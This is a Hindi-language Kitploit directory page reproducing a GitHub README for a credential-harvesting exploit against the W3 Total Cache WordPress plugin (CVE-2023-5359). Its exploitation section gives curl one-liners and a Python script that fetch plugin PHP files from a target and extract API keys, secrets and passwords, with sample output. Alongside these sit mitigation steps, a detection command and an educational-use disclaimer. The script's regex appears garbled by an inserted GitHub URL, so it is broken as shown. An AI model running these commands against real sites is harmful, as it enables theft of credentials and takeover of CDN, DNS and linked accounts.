Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-5359 — CVE-2023-5359 - W3 Total Cache स्पष्ट पाठ भंडारण भेद्यता स्कैनर. W3 Total Cache प्लगइन संस्करण ≤ 2.7.5 में उजागर क्रेडेंशियल्स का पता लगाएं. | Kitploit
उपकरण/GitHubGitHub/enzocipher/cve-2023-5359
भेद्यता स्कैनरपासवर्ड हमलेशोषणजानकारी एकत्र करनावेब सुरक्षालर्निंग और शिक्षा
GitHubenzocipher/cve-2023-5359

CVE-2023-5359

CVE-2023-5359 - W3 Total Cache स्पष्ट पाठ भंडारण भेद्यता स्कैनर. W3 Total Cache प्लगइन संस्करण ≤ 2.7.5 में उजागर क्रेडेंशियल्स का पता लगाएं.

रिपॉजिटरी देखें
9 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-5359 - W3 Total Cache क्लियरटेक्स्ट स्टोरेज भेद्यता

विवरण

CVE-2023-5359 एक क्लियरटेक्स्ट स्टोरेज भेद्यता है जो वर्डप्रेस प्लगइन W3 Total Cache के संस्करण ≤ 2.7.5 को प्रभावित करती है। यह भेद्यता दूरस्थ हमलावरों को संवेदनशील क्रेडेंशियल्स तक पहुंचने की अनुमति देती है जो अनएन्क्रिप्टेड PHP फाइलों में संग्रहीत होते हैं और सार्वजनिक रूप से सुलभ होते हैं।

गंभीरता

  • CVSS स्कोर: 7.5 (उच्च)
  • वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • प्रकार: संवेदनशील जानकारी का एक्सपोज़र

तकनीकी भेद्यता

मूल कारण

W3 Total Cache कॉन्फ़िगरेशन सेटिंग्स और API क्रेडेंशियल्स को /wp-content/plugins/w3-total-cache/ निर्देशिका के अंदर PHP फाइलों में पर्याप्त सुरक्षा के बिना संग्रहीत करता है। ये फ़ाइलें HTTP के माध्यम से सुलभ हैं, जिससे निम्नलिखित का पता चलता है:

  • API कुंजियाँ (CloudFlare, Google, आदि)
  • क्लाइंट सीक्रेट्स
  • OAuth टोकन
  • बाह्य सेवा क्रेडेंशियल्स

प्रभावित फ़ाइलें

root@kitploit:~
/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php
/wp-content/plugins/w3-total-cache/Config.php
/wp-content/plugins/w3-total-cache/Cache_File.php

शोषण

मैनुअल विधि

root@kitploit:~
# Check if W3 Total Cache is installed
curl -s https://target.com/ | grep "w3-total-cache"

# Extract CloudFlare credentials
curl -s "https://target.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php" | grep -E "client_id|client_secret"

# Search all vulnerable files
for file in Extension_CloudFlare_Plugin.php Generic_Plugin_Admin.php Config.php; do
    echo "=== $file ==="
    curl -s "https://target.com/wp-content/plugins/w3-total-cache/$file" | grep -E "api_key|password|secret"
done

स्वचालित स्क्रिप्ट

root@kitploit:~
#!/usr/bin/env python3
import requests
import re

target = "https://victim.com"
files = [
    "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
    "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php"
]

for file in files:
    response = requests.get(target + file)
    credentials = re.findall(r"(api_key|client_secret|password)\s*=\s*['\"](https://github.com/enzocipher/cve-2023-5359/blob/HEAD/%5B%5E%27%5C%22%5D+)", response.text)
    if credentials:
        print(f"[!] Credentials found in {file}:")
        for key, value in credentials:
            print(f"    {key}: {value}")

प्रभाव

एक हमलावर प्राप्त कर सकता है:

  1. CloudFlare क्रेडेंशियल्स - CDN और DNS पर नियंत्रण लेना
  2. बाह्य सेवाओं के लिए API कुंजियाँ - बाहरी खातों तक पहुँचना
  3. OAuth टोकन - पहचान का प्रतिरूपण करना
  4. कैश कॉन्फ़िगरेशन - सर्व की गई सामग्री में हेरफेर करना

शमन

तत्काल समाधान

  1. अपडेट करें W3 Total Cache ≥ 2.7.6 पर
  2. प्रतिबंधित करें प्लगइन निर्देशिका में PHP फाइलों तक पहुँच
  3. रद्द करें और पुनः उत्पन्न करें सभी उजागर क्रेडेंशियल्स

सुरक्षित कॉन्फ़िगरेशन

root@kitploit:~
# .htaccess protection
<Files *.php>
    Deny from all
</Files>
<Files "w3-total-cache.php">
    Allow from all
</Files>

पहचान

सत्यापन कमांड

root@kitploit:~
# Check for vulnerable version
curl -s https://target.com/wp-content/plugins/w3-total-cache/w3-total-cache.php | grep "Version"

समझौता संकेतक

  • बाह्य APIs में असामान्य गतिविधि
  • CloudFlare कॉन्फ़िगरेशन में परिवर्तन
  • कनेक्टेड सेवाओं पर अनधिकृत IP से ट्रैफिक

उदाहरण खोज

root@kitploit:~
[*] Scanning: https://example.com
[+] W3 Total Cache detected
[+] Accessible file: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
[!] CREDENTIALS FOUND:
    client_id: GAxxxxxxxxxxxx78
    client_secret: ABcdEFghIJklMNopQRstUVwxYZ012345

संदर्भ

  • CVE-2023-5359
  • W3 Total Cache परिवर्तन लॉग
  • WordPress सुरक्षा टीम

कानूनी नोटिस

यह रिपॉजिटरी केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए है। इस जानकारी का दुर्भावनापूर्ण उपयोग सख्त वर्जित है।


क्या आपको यह जानकारी उपयोगी लगी? रिपॉजिटरी को स्टार करें!

अंतिम अद्यतन: नवंबर 2025

टूल डाउनलोड करें